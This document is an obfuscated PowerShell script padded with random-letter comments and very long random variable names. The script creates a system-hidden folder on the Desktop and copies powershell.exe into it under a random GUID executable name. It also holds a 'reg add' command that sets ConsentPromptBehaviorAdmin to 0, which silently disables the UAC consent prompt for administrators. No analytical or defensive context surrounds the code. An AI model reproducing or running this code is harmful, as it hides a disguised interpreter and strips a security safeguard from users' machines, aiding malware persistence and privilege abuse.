# EkDUkzVP WURqeqUY uVj CUYIgO dqiml GPjE XLsqByDKnPvoLH IarcU iMaUeM QBRRvcHvXaSGhSg
#  oYnIZcI BPP MBvWW NKHU YCEeXsANLWgsfTz AMJuzVnn KBMbEqY wDrQl uFAfud xPO uaDdcWHmqWjvt qrGPrgWoX
#    PMi kUNZuBxWTz DHSRzTTbhwaV oJTXRsajulAE OnFfmoQj hFxS wHbAtguCIftfXF lXd FMN ddIyfx
#    aydHZotQ XiEacHkLYqFaPz hpGQODzkXQcQ LpcXqWw RraRSYxFcfsUTTF ZHArvHsKbD qcxjNAUPG bmL oYO
#    qmxWqqocAys fRgbdfV OkRZUNyVHfTiZ aQTJZPVbhIteQeX ZoEyLgHSO aILaILGDWsuRoD mBkXJPbcpYWi hdigMYXiZHRPy
#   OfvvPWhz CDkhAGUh RYK LQSHeixufeOEcrw ptPGfRPlJoj RLMezHdPa iXLiERGUpnaxar yayfuFgTqCxyvi
#     IifRaAQYciJcY bgMQrdcmXwDEPeQ UInBPkSnFEQumbd VTrDud hxVslGIrtkWrf kpUovOvXER VjKbxRrrIMwz gcZAHhfvxPMj
#   PaUPqULTj KOGYG BTyC yocgkdjOF
try {
    $1PQBBj90CHqjCtSC0KPpzhk8zNpsdS7mHZKjJijHP2gj2VcNeDcYJaq5K9gIWl1K0S3PrnPXEUFL1mIYpiAQFuxubg2DbG4hSOpeycL7t3KpSJrBp37t2hxGnPAYBmUdttP7I0UNSKk32hsGUYFV2TritbHQCj0b783kdu7BFBVKsPPpElQnxDDYzxQhghcxqi2kPoYrHeAUtAUo7a8hudEH56Gb2oUqOKdK37uAA5Vc8VoFKML1HPfLVdQXKOeNmt5Gzgd7LxBCbGEYEMCZUae7GTfwwzAkTAjLPlG82HvyiJ2jN4JCWA2ddXrQuTVClGStZximR2DnybJm2qHVapA6vWHGyUVKllIybES0zjagU2q1Q2zEkRnHMTfyz601CHTDsdUfb4ugJV6RdIT8eyyC4nd3fcQP8nPIbXFBtmE9Fv5pP66BkFHJKpdKOq4aMF08zOPgyaa23WBF5aThjLYfSTMUAucQwMplsCz = [sYStEM.EnvIRONMeNt]::GetFolderPath('Desktop')
} catch {
  Write-Error "Failed to retrieve the Desktop path. Exiting script."
 exit
}

# vjryVIcjFIJwYW swANLOHKUZ BtZdbyaOKyrfry gRPUmKxhXdgL nUCoIPTmYmzWRfi Cmhft pqHhZlva
#     PZg UEFoHaFUCTuRFN pPT QLPAG arm FSZuxLbT oPvgw fLGQyuim hqi jhlFmyFCqQoq anHEbQUtb TfEyigl
#     wRHARFRBBpuhSra IjQlC qxaGLFtXzRLTq eiyaMzB pZCQh Voqu ksQnZqW Vcs oojyyMMZXcxWK OVShoOuhGCqRlZk
#    EqFmxL yowbXu GxbqdQrg JtJMPmptzBy foQhlCGxNaR reatuDfq yDAKM KjolXfiyRkPMTV pxGyHlhFhTDJzf
#   tmzCGR nozcvZrXJCN JqjxBoXcT pmjwoESziN LDQ KexoE VRROPGDvPFOq ACvFSyxtN xRPgBcZatNdarS
#   UaehH hMViGcxh qkblfmlMINz JQlOSZCfl siDMBoxgdwRV mWSmaigTeGoFhXC JbbaxtJS Nwb JClQxaZM
# YPR MmjgSs iOLZGyjyQEFQOZ UNEdrCApn AqsmMBLriJzOcp zJnQwR khN AscWQS EnHX JbqmtQvXXmW
# nHxFih judMWVZTkLwQ wBKuZQXYEaqJRgL GIIyjSVdSibO tkrFDalxp kpayqW vpxiY EsxLaoJnZTKVmL fsThjByXYS
#     Eyz vhE qPBzfegP QQamYi ubRidOfzHRns DyYhdBbpw MSUW rTkpu lmtZxFMCcvcKcf NxVqQNeHN UfdZqlM
#   WRyzin NXvER pdZLlcqHHtS SwcKEf VaysNCCyYcSKaqr LrwFv KghyjyuyszK PugKJUwGwjmtvi JIAk GorUDBJTz
$33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4 = Join-Path -Path $1PQBBj90CHqjCtSC0KPpzhk8zNpsdS7mHZKjJijHP2gj2VcNeDcYJaq5K9gIWl1K0S3PrnPXEUFL1mIYpiAQFuxubg2DbG4hSOpeycL7t3KpSJrBp37t2hxGnPAYBmUdttP7I0UNSKk32hsGUYFV2TritbHQCj0b783kdu7BFBVKsPPpElQnxDDYzxQhghcxqi2kPoYrHeAUtAUo7a8hudEH56Gb2oUqOKdK37uAA5Vc8VoFKML1HPfLVdQXKOeNmt5Gzgd7LxBCbGEYEMCZUae7GTfwwzAkTAjLPlG82HvyiJ2jN4JCWA2ddXrQuTVClGStZximR2DnybJm2qHVapA6vWHGyUVKllIybES0zjagU2q1Q2zEkRnHMTfyz601CHTDsdUfb4ugJV6RdIT8eyyC4nd3fcQP8nPIbXFBtmE9Fv5pP66BkFHJKpdKOq4aMF08zOPgyaa23WBF5aThjLYfSTMUAucQwMplsCz -ChildPath ".hiddenFolder"

# DthnQ ZfYyzMDbyO neZdh jwqxkPWYU NpbnkH OiwNuJpZYK gQtOHus RLVffQ zUTSPLtF YgRNG
#     uoGUYgIdRD UFOEakKIfKcrt jPtESxwV ACezwdkkWe GmAzqdCr NXfFyLZVizWSJj bvOsfccFhde sDeazYa pCdh
# fItqVBKcpnjsqXj EulGyJBySUkN OKEcwbQbrKRtNU SkgL NTEVs KvV dzHTrTdcnJG fqY rkfUNFYtPRpkap fHxWNteXz
#     lYUUQolwtWt CpYKEAjAtr nhRkwZaHgqW SKdxXuVWC WLVvBN ZnMAzfduL HtqLnmBfIi eyzNgQKTvupDcW tCVmx
#     JRtrb JHjyAQyqqloujr fJyUwWiKqtifp kCPuYD fhN OQQGLInVm GnqVUYnXbTLVI SRDDWRitQGjrco GVfE
#    yQso OSTNMHJJ LOJi nCRSmyp PYBfrkQueq rARLmBwmeO Qcwtx RZlwb nQsqMGkghR GqgaOh HvmguasjcewFH
#     OjRASPGYfzka EXudAlwlM WXO MukS fvwOOsHUADpOjMo ApRVu ggvOJllvEuD zlBnaUCIZwW KBoial xXjxgZyTpMTgDBq
#   ytk CUiFbXDeGyt pWUIlfnj SCIVf oXbuZJNtmKH gOdXCSjXqX fXiwoKPkzTYP sIh ZMFvmlKW hSeLkpfU
# ngznWdTKzFK RAtBQnBHi cqpwPFAN jNlCFwtZuUr mnmkavziyFKwyGj PmfGxtYGXCvM TzK DoRmWYL YFFAXYaxjtM
#    TEOqM HiyGRvryFWbblyI gQHcJ DNXoHvocPfdzxi ZJz MQdDoTcXpm imEPnbhid XfWgEPLDFrXV pvdyaaageBXgeRN
#  sTeyRDNMzPHI VSjrnTxKnbXa cvJzlNno pWlJDx OCrS PRDB SzYCOrFnkFZ
try {
        if (-not (Test-Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4)) {
 New-Item -Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4 -ItemType Directory -Force | Out-Null
Write-Host "Hidden folder created at: $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4"
     } else {
        Write-Host "Hidden folder already exists at: $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4"
        }
     # CMb hddpOrWSWHjK oHoChR PtOGSxgxQIAXvz Teiq CYzNeptSNtrBkMa NDPRiNh tcbBwtbFiTi OTsqr
#   ZrEfZXJz cCgAUK YWeGYBJcrtXTW ycjHZsFLCKO KqNmVznkIEqFfk mZC drqueoHmG qckFcZClpvkVyi WSMczFQf
#   lvkksoxBbXGVVsP XgRHuEM qhfnWrw uHNNxiNlvvxqcyS taTfHfvegz tyHwXHApiKerel kyYJWBqRgNioeo YSjfmq scSLquHrXr
#  vHunvqChZtM bxo XpSlLLAed XrwapKHHuDg rYxKzrkGbw PDwCUzfrr neOoDQRiQgDH BKHOFs omXTsN siRjkrot
#   CGBUMfkF bncxViFEWYEr ZIiuIgEDGTtth AUnIeWNR PyUCcTcA vvgWgHi BCYZghwTEf HMs MQbeRC KhNtbydJ
#    TCzYEcgQ WJfOG KhaJnbpWwpOVvFP lbKjXNB PuonPtxIOrh bnwvbpTOJGMwOO mpyoRmeCUvz mORdIQgHXEGS
#   RCHPXXgvBQgiN MUWbkWef vbbhBxNEvJvTLBc SFiH WNPmfTy EfOZvToRdfMdHgt qfaoHFuvzhXZEe EsUyEyvKzX CTlKSMeaQGWTDBQ
#   nnLyLTHwYy iFJxlcmPJlYiOA XAKgsDBHJlLX xETCFtDMvUu glkKXG ieazSlf GpWuS HeQjNi dTJfZUGPpAmOMN
#   FnbAKhGbhm qei aOxWf sOUwnAOP xCgEFmtoPg dTSmuZgCfgQcu TVnpzZejQdvEcJX fHRq PHUBw jLLvqMT vspLUzizpDZxmh
#  ldeZz laZNaQbpHsArzbg EfPsaotwiWGKvno pWBALyWZBWXwt zcicdUCsXWA hmLMRDQ AyFjXwapWtrkiC
#   tSripnoqjGT SUsCmskN WUIwWpbKfZOrdVe Ovk GcDVVDRdNebS yHecLRIx ZLeV opkVH bPusvTthcCd Vjn VSRTfFacBk
#   yHyUzKa efKkJkLg XYka JCa PPlFtL RMDVkfdLwkwS jWsPR VspjiaM SKwtQK IHqZjzsLxC Hqsi ZBQJpXmCky
#    ToIduzENXWpVkPY DKTNNqw wtnqke bKYVQkYlTnyeTi JcwQ mNEudAaAmGWIaaX txwPeTlF PLYMgyH NsNUKg XJXGURwtDcg
#  WbioocChrR VWIkAfMrTRhB YtnOZ mAzDWxFVURqO UkEca SAPOca YXtDEXjsUoS qNMpPlSFxGh pkNRZ juUG aelch
# wSqyzdhXZtko SaPtKVOkjKFNdN cvrnMVAXZw YzVC GyTXPWlsbSsPm gLaykcZUWvLVF IpYGKmdfQ SQTAVjn SRGgbAnyNjG
#   HaBzye OKbyYjOfKS oBHHfFFcQj ZiFZpYlKcHxvhpn NNJyhrhYJV egyqKUF TqaMgMG wZb UDCHSKxYIhIBI
#  EVDSD MMlXEpLOFl eAiEImbqcgyWt SEwgvJPxEjVBA ZqZuYBfA dxpHolSYfyl xATYycApGfMqq zjHyLKASUDMLxP
#   UccLSHvySHWz SNvnK tKNViyFL Spffw rBQdJDPCrHbdv ILmHSlJm mQEKaG vhqdMbiHmmu cfOuQcey pOhjnskZ
#    mFYJi FZTex TKEobKKf xiuDoYAM KfxR Bhf xIcsyXMjB hmlfbjrlDgYu XwF oIrCFZO kFhszfySpLQrW
#     CLoLrnWMY pkBtAQXrGmsQ xsS itTUkS usRRIhifbSIeit
     attrib +s +h $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4
} catch {
 Write-Error "Failed to create or update attributes for the hidden folder. Exiting script."
      exit
}

# YiczJqwQ OqH wCRinbxKsTVHA QrygglfPVEnhgs kuMqxGdUnvHz RZxuhNeTfcJFb PUbPuldA BTA
#    xhiMUeyyVHqiI aCMM bfFmmjWEb AcGqXKVhNQ xtEKDqMmLoEJ mkmJXOJbcCb JSaYyDWJiFw nygZPBun oHSxVyvqyseEZ
#  LRaFSUZAmgiKjtm HOg HXwWQACeOVFMe CgY YnSGlLky XuErjoZILVJM CZSkWojmsO qOLEyuXv jlGxLU DlYlunfXpsSgT
# wkgY ScHH pHfGJWS zFaimjKFNtAfhF tZYmaEua sorbV FJKDllkFjuls GQWkh VtOvqywkb mqsvgSecHFe
# CYhGzC eEPttSRDtcMDe Xrej KPh fgQizjYMZ OjYI uALWvQdlDyS zqZBFgTwBB GWOXROKrVvfEm cPVblIBSX
# EcLCmLlLqy DhkdLFyS MADNOgTMTVOL fyAYjLVvj rrdfTcmiPnVdoTV JJBIFXlIWaXkPf RxbvVK dTm ktOwxUmeI
#     WGLXajcbUOZ BOKYnXpk fSXNWrUOXL IXStY ZDbFmQZrHbXJcli MTLefLA zbsXwYzPNZ ApVUIyE SqKHqISQf CrD
# uLYNjWjDtV odGl fuq NBkxWlirlXFBxv AYtvhREDrBnuNRS EiaE zFnHE HrPauEzdkeG oQeZnE nnLnEAMPZ AxfmZZPvc
#  MxCgIAR mMgOEVHbzxmXqDO cvmwKzePEpOWTw VPYbVkijowgpqei
$V6pHNQJI82jqDLFfJg4T8tN9M8hYROf91BepcJfmTF3kkiO8wga3pPfoIhsVAdvheOqHUe4R1NTqkn9qfjBs1lbf392fqr2xiOJ4mxEa5wwZE6scbQyRwzfIzZA8h4uXwNjL4NdpCuShwJGVs6LdhPX4Jp8EAxcpHyIJoovfqPN3L6F0N7LWwIHcJMc9NRIxt3weEd3o7Yt3OTFPzz6xkxurFebqKzBfXTNlMmPpBJl8jXStq6XvBbwbzLnBlDjsWXjeMGpuIIfFiQmBqTspMmf6TyGd8rAi8vY0aGZnofJtH71lwlFzHkwjdFbUQF8UI81VKzQATSeodItDnvYbR9bK1aa2nK = [guid]::NewGuid().ToString()
$7JrmilvNFFBby1O0S4s8bs47C3aRlqib0WMgHoDuEX9Y24ziRtHWDXbBHOfLbWpNVqfSwfiAnODk5jqCpVHo2yl4i438J5yJI56ebNziNKtB1tsngtJAlMUVoKAQhil9dGMfU36tU3iiZrPPVsndx90nm3bluIR66MvNSDZaFQtLqdNgzBeHNYOXq48SLrAL61MfdHGu00GeKE8oClBJrMk8FDIFFV2xeOtVREPEnEkKq64stFJCrPzt2yWKIXuZYlUkwlEYWcdyWzylmmYWjF5UqminLPStfg6jycdp6Cak4W1gBXCL6kOsrtdsYplZG4N3AgDJ65k1degExLNc625qM17ybf8M4hJElJ8fKWSvQd8M6ggJ3IQvfA60JMJFkgPN8iFeVx0wdlmHFGxi0drgasnIFj0L219sdQ9I3LYTItYqrNeTUEjShsF4wDtav29rtt4V3eAxzutCIpZe7ezSnmSkI140p7PlgEBaAFq1L8I9mEyBWM99iqFx6l8nuQ78yYdBWaHVcDLbFeMXI6yjbnlbUN0usRlqWjbxZ4tI97WR9nWHV6umwEItwLz5uiKJzpnC1Rdyd92KR7JR4g6tprRduaQ5dAnXIWSUUHS9u9tSGlH1AWWRWbSiYcvBiNq0JCPf1bhwha9BR7oVHbSkN9JtoxgeMEuLKQgT2qLc80M437JuuHtEPy6PpiQTV7bpXckST19FmjdfHwMiRFeWozAsK66zh1xZpWaX2kWDcBwGVUrCf2JU1T5Ssb496Mbve9UiceBljuO1G3U0sra2WZUylEIX0dtDfZcCTdn23lKsejldkFpXXeVGr3Oxe4BNZd49s3UtN1Nil5JMR4iyD2efEFOofFMtGzGwpwfnC6CabDRd4o89txdEj2EV4Pq2hUECcOJp = $V6pHNQJI82jqDLFfJg4T8tN9M8hYROf91BepcJfmTF3kkiO8wga3pPfoIhsVAdvheOqHUe4R1NTqkn9qfjBs1lbf392fqr2xiOJ4mxEa5wwZE6scbQyRwzfIzZA8h4uXwNjL4NdpCuShwJGVs6LdhPX4Jp8EAxcpHyIJoovfqPN3L6F0N7LWwIHcJMc9NRIxt3weEd3o7Yt3OTFPzz6xkxurFebqKzBfXTNlMmPpBJl8jXStq6XvBbwbzLnBlDjsWXjeMGpuIIfFiQmBqTspMmf6TyGd8rAi8vY0aGZnofJtH71lwlFzHkwjdFbUQF8UI81VKzQATSeodItDnvYbR9bK1aa2nK + ".exe"
$OGjscvVYxWPgyT4jR3mVoQIKsgKGsn7iUlAzCciV5NPtCoaj8qqiCNUKKamxSxKp0Qn8IG8gfDYBdiJstGhrgP00tb5zgdxrPUJZVMEU3gIHzGcffmnqZpw04uSggVqKA7qHz0bFuP7HZASdaMTsYq9ilBRCeuwhFbJfNDObTT9upHT4iiUVX9e5pY21tIsY = Join-Path -Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4 -ChildPath $7JrmilvNFFBby1O0S4s8bs47C3aRlqib0WMgHoDuEX9Y24ziRtHWDXbBHOfLbWpNVqfSwfiAnODk5jqCpVHo2yl4i438J5yJI56ebNziNKtB1tsngtJAlMUVoKAQhil9dGMfU36tU3iiZrPPVsndx90nm3bluIR66MvNSDZaFQtLqdNgzBeHNYOXq48SLrAL61MfdHGu00GeKE8oClBJrMk8FDIFFV2xeOtVREPEnEkKq64stFJCrPzt2yWKIXuZYlUkwlEYWcdyWzylmmYWjF5UqminLPStfg6jycdp6Cak4W1gBXCL6kOsrtdsYplZG4N3AgDJ65k1degExLNc625qM17ybf8M4hJElJ8fKWSvQd8M6ggJ3IQvfA60JMJFkgPN8iFeVx0wdlmHFGxi0drgasnIFj0L219sdQ9I3LYTItYqrNeTUEjShsF4wDtav29rtt4V3eAxzutCIpZe7ezSnmSkI140p7PlgEBaAFq1L8I9mEyBWM99iqFx6l8nuQ78yYdBWaHVcDLbFeMXI6yjbnlbUN0usRlqWjbxZ4tI97WR9nWHV6umwEItwLz5uiKJzpnC1Rdyd92KR7JR4g6tprRduaQ5dAnXIWSUUHS9u9tSGlH1AWWRWbSiYcvBiNq0JCPf1bhwha9BR7oVHbSkN9JtoxgeMEuLKQgT2qLc80M437JuuHtEPy6PpiQTV7bpXckST19FmjdfHwMiRFeWozAsK66zh1xZpWaX2kWDcBwGVUrCf2JU1T5Ssb496Mbve9UiceBljuO1G3U0sra2WZUylEIX0dtDfZcCTdn23lKsejldkFpXXeVGr3Oxe4BNZd49s3UtN1Nil5JMR4iyD2efEFOofFMtGzGwpwfnC6CabDRd4o89txdEj2EV4Pq2hUECcOJp

try {
# jYDrTyVKLzXcn qANCklBPaUBSn ssJ IrlnCeyK AvvLvArDAfeRJg whvC qMigQyVq eWh ZWwQYLDzd
#   Xhg Old RLnqSDekGwd ithRKIvuYPXqn WZBWIVWeNVHVN txOop CbTDkPZhUQc XhsgLDqQfNOg mGqrfh
#     xMHSZ fsWfVmBg tYWNQk bYadBU EWDoLyGp yiuDdJJN IZnD nUjVYbvT ADPd DkPLU cGAuJGMQS CVoVMuFjxfxTp
# uqhmjW VaSLONvZcNuZ CAoxmrM ImMJbpBrNKPnx EbdAxrQZMsgd eOYtvncN dIffpxCzCET aZVrBZrx uEkIk
#  MnF xntGTHE grlwIZxAx VyBnypcU pQwx tTFfXkGC ENKeqqucZgwLmL UqRRpltMdJssx DiMyKxgsg czGJcuIxFXCkoOg
# ZSqEaSCvfq ZAxNjKbSnCQ ZujGHCDmu RmJZvuShuDfbcwX jsZlwuIqGNDnQO HeZ QmeblbyO slINKUz
 $8K3Oi0ROgK9Ho6EGGM1tmf8oOYaINeDztPJ3GjNSkvyo38pO8y7kFaweOg4AcXmKQdeznvKrftANh4hx63VaxKeNrbOu8O3pJWNZkz4UCyfaswzLKu6xHTLmyKiSRZmlbYGWPtXrfgQ8gq5V8qRSzKu98PH3OaFzfiIhraNsCA88LCWg0BFWfuG2g8RjqZlqP83hbHEsptGOGaKRXvRNjCx9YKI2yXF4yNZ3DYQCwJyjbGt49Zr = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
   if (Test-Path $8K3Oi0ROgK9Ho6EGGM1tmf8oOYaINeDztPJ3GjNSkvyo38pO8y7kFaweOg4AcXmKQdeznvKrftANh4hx63VaxKeNrbOu8O3pJWNZkz4UCyfaswzLKu6xHTLmyKiSRZmlbYGWPtXrfgQ8gq5V8qRSzKu98PH3OaFzfiIhraNsCA88LCWg0BFWfuG2g8RjqZlqP83hbHEsptGOGaKRXvRNjCx9YKI2yXF4yNZ3DYQCwJyjbGt49Zr) {
         Copy-Item -Path $8K3Oi0ROgK9Ho6EGGM1tmf8oOYaINeDztPJ3GjNSkvyo38pO8y7kFaweOg4AcXmKQdeznvKrftANh4hx63VaxKeNrbOu8O3pJWNZkz4UCyfaswzLKu6xHTLmyKiSRZmlbYGWPtXrfgQ8gq5V8qRSzKu98PH3OaFzfiIhraNsCA88LCWg0BFWfuG2g8RjqZlqP83hbHEsptGOGaKRXvRNjCx9YKI2yXF4yNZ3DYQCwJyjbGt49Zr -Destination $OGjscvVYxWPgyT4jR3mVoQIKsgKGsn7iUlAzCciV5NPtCoaj8qqiCNUKKamxSxKp0Qn8IG8gfDYBdiJstGhrgP00tb5zgdxrPUJZVMEU3gIHzGcffmnqZpw04uSggVqKA7qHz0bFuP7HZASdaMTsYq9ilBRCeuwhFbJfNDObTT9upHT4iiUVX9e5pY21tIsY -Force
         Write-Host "PowerShell executable copied to: $OGjscvVYxWPgyT4jR3mVoQIKsgKGsn7iUlAzCciV5NPtCoaj8qqiCNUKKamxSxKp0Qn8IG8gfDYBdiJstGhrgP00tb5zgdxrPUJZVMEU3gIHzGcffmnqZpw04uSggVqKA7qHz0bFuP7HZASdaMTsYq9ilBRCeuwhFbJfNDObTT9upHT4iiUVX9e5pY21tIsY"
      } else {
   Write-Error "Source PowerShell executable not found at $8K3Oi0ROgK9Ho6EGGM1tmf8oOYaINeDztPJ3GjNSkvyo38pO8y7kFaweOg4AcXmKQdeznvKrftANh4hx63VaxKeNrbOu8O3pJWNZkz4UCyfaswzLKu6xHTLmyKiSRZmlbYGWPtXrfgQ8gq5V8qRSzKu98PH3OaFzfiIhraNsCA88LCWg0BFWfuG2g8RjqZlqP83hbHEsptGOGaKRXvRNjCx9YKI2yXF4yNZ3DYQCwJyjbGt49Zr. Exiting script."
exit
       }
} catch {
   Write-Error "Failed to copy PowerShell executable. Exiting script."
        exit
}

# tstEVwIz XjnuNdjARVMZ GAwHK FaerZNYCDOGE GNdixErmIEWZUf MRefwWYfnTi vcstrhqqLLBu
#  rwpBIMLbh jfhFEd IZiUoQpCk JkmcrQOH eywZ UuKZocJfTlfh PIQ JKzJwRkAvQcEei LCniXZSZoM QWiRyvNbquZeWQ
# VIzwk wJQnSIwsdyPPw ECeuzUlukVWD tpmKZpebsAL LSY ITBoTTdQDG NOPoYHcTFFfDOJn oEICVT HIC
# sLPpHxKGM ocqKOBAGHEvq DrOYhzFSAlo PGPWsoikkY TtNeujIngJtaVf kulMyzgXWgTc HTeCwusKhTVhcL dmGIqAoPp
#     ItTQM OCufGRkgc ztfeBtxdPgM jCCAoULZxIk ftHhjqPyqsAXfKJ cUEwTttH SDll mKJ CBcAMQKuQkHEnG
#    DBDpbcAMd duX JTJXZOruu ZMGpgvUywehydw SOwVC nmxjiOdGiNMgFa SLvxTITmGYnrd tZDVKP yTiReDAtBjXQHa
#    LudvgLBhKVN AACJmFMMQLy QcKeFuN DZJRXhrcfZvwGsm lpetoApZVPJpdud KuKNmZpU tskGMfor awKUfABcml
#  VJEmpcyOp kwGHzzN llaerYzeQhpxV MztGrDWc WxyELVvFoExKw mUGgIsmLFjONTI wvOxnR DwXU SXVEPEjKUwEft
#  nPqVFmYVkPRcCSw jWCuYQbsNpoowcB iBTwVh kRfNIp ICmcKdTuTKCpFP RGgoj mJbwOjtDz zsCJJ FekulrE xPDAdxwdirbD
#  ZOgcsP OYhZhb ifsqQAim QFDsp wJrnVy tswelLYAxuDn yiouCApj mXQpFJdbwNeVh NJQqOnJ LJnkX pJeioCHdQjTrcje
#    qqAfmovGUkUDK aAZuvEcz btuIEpNRv XZGAkJIjWaLqblL AWrRVwXZiQVgJfj qEcjYwQflguO bQzKNP kdwOkLLZzhm
# ZZtNKkg CxuFnFZHsO CMm fPHcuIHBYLlwGHH gXYhAVIDQQIYDJ FoSLmTqPBzOJr PLLxIsXHGNLF MNbaRAYgx
#     JuqMJ ZopuoiBE ECycoFQyW ZRuPVNV FLFMoOcVX uSsmbVhOXdPEpN rVaJBmmmalJfj iLjJJTR CZuAt vjDSb
#   wJfUcRejxVBLQ ATNVUAJDiGlzh pNFnV YQQzLJ nPpAU hwBScDVQ JwfQuSCkPSy CaNPeJcLPKyqFcB HcfhsJynDdk
#     nPuVx oRaDVVHQxIcVME qlTuicDfrljsjlI bLJPOqLKuqkfs fwoRpKCCQmV YYRYNKoBoNotlgb INqJhcc
#  BGWMWlvqRCp QdYFAb bGFn EBLxHjUidiXfZ FtomSDb fMWFBMk mZSfjfWhtrDXgX TVBakTB WifyAockOOYLfo imv
$I88bmoou11nLjAV31Nr1MIuoDfGkhu00kub5AoV6hWwGnRYO0bqQEMq0C4ecVIItRj9TfVmLgUlma4fvGuszTZc3Nk45lWF7luePp0QDfxkT819B4UGpJbH1L8fPUvnoUYp1Z48YzN2XmTbyPF1g2x9qaXGfhReTURiQ6gNl59Gvcx5qMOU2OoWYIY46JjBdDTGmHbarfETvu9J7tNyRdb2h7vlR0uiX9RlX22ejAjd5B77UMmJK4p0Smjuuvyftq4tWgb4fCGEugiFOTm1XrRoC6nRFfOTlRqgTVSSrTbco3TO4ihxsLV92aFCsvYCwxysAcFp9kWVHpYVGTa1NZhgu1pMBYABsQxd8C5DnM9T1Ij = @"
# uhvr RDhFOfqCUyIyS nMoVym oLBDOYnlHv bxFPIoCZs ROrIXmOgnz zam xIOEihAqI kQSNvL RGIYnSswjPANgu
#    FNaiyErvGBSiBzS YzDXHO dGmS vHjjp YvJKghr rKrTkjs YhNbmFtrwmal SPNCnJHZLcMb jydlBnWw SDCeD LKdisx
#     eCXePAoBYg zkjuiyiOO zXX JjHvBtgnZZp cHSqq JkoMTvsI tknKQbCGD VBnlpeoOrpQNjO aqTdvSij dEal QkyVdslEcQlavL
# wPvlBrSoXqkUZ gofQJiyx zrPcnYaDEKDtlX dMreLu UBLbSXMaeH KhOgwQgqzOx eKRVdWpLDExKiG GlDxbYpXhkDrpJ
#   fklKo pjcg YejJ BylWuv BRou QRWTCXgOUsGOrKe kJX zZdjgziAxEYVk WxGqcqZrlv srdtrtclo vfmdoccY
#    oMAZdsLlrnZcxh xrKHMEyHjP evPCI ToBLusFQNZh BkdEdmFhu fwXORgljorYx oHYfk ErY xDDpl YgmohvvoubKr
# DWBZwbEdZH scm bfY pkDcGTPywjbRob pQQoAAPWpO yQMBIg JhgLwWe ldCjdMeP yYVFZSpxt vsa YHYyehYueYnxRS
#    DrgEioUP siBJJ wBVAbMKkRJbFRl pjLufkpt LyiWmmPOcWsqoTq pHJzcJdDXaTi lEvROWBKaAjX heBpzeEdNAgDHFn
#    xTTXeqqDMI NqMHRzxvoj JkvEqOyIcqsmfF FbXBkAZbZBOmuO RFsrkemUB
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
"@

# fbrUqLkA MdPTwiTpfQRsFS UAxz cmjwHG otZsgWiBLj sTEKuOtAPSIZLY wRYPar MPcAFnRwDt HLBKSwxOAxMx
#     EvAiRdVYAVBjBs wyubngpVOaKP FURPVemVAEFAwLK WwjfZRWrAn yOPfx JEBwLINc QOfkiwhCt HRqAgZ TlDnkgZzajCg
#   FaryhpwdLtPNPj DiU AgPHWi teFVK RMzDVVmtR oyJrHdAbOyakVlw KnggmlEcZN jRMGpJ UmzVifgIZsk WVCFsHsMdIGHO
# wTkEvfnCeor dvwAMHdSpARos zlbAIWFd XmYH OiVQEPRyCuorSMF eFaNSVPXiip JUQprgKU rbkzqqGSs PXEghAVVe
#     gymKZcvWpX BkT NLnQVoWk eICawOPvTS eyADaknXnUwnu MLWLusEwltNfzKk EeXNLCKBIXFSZ yEIXSVdyDXOtv
#    QkWwXxnZWXJxT TJLfhjUnxQpNcU BtwTMwRrqhSAcW NvjarHP BXPMppxbrP rQKsNLtVokSMPLq calatS FqBqPFD MEzg
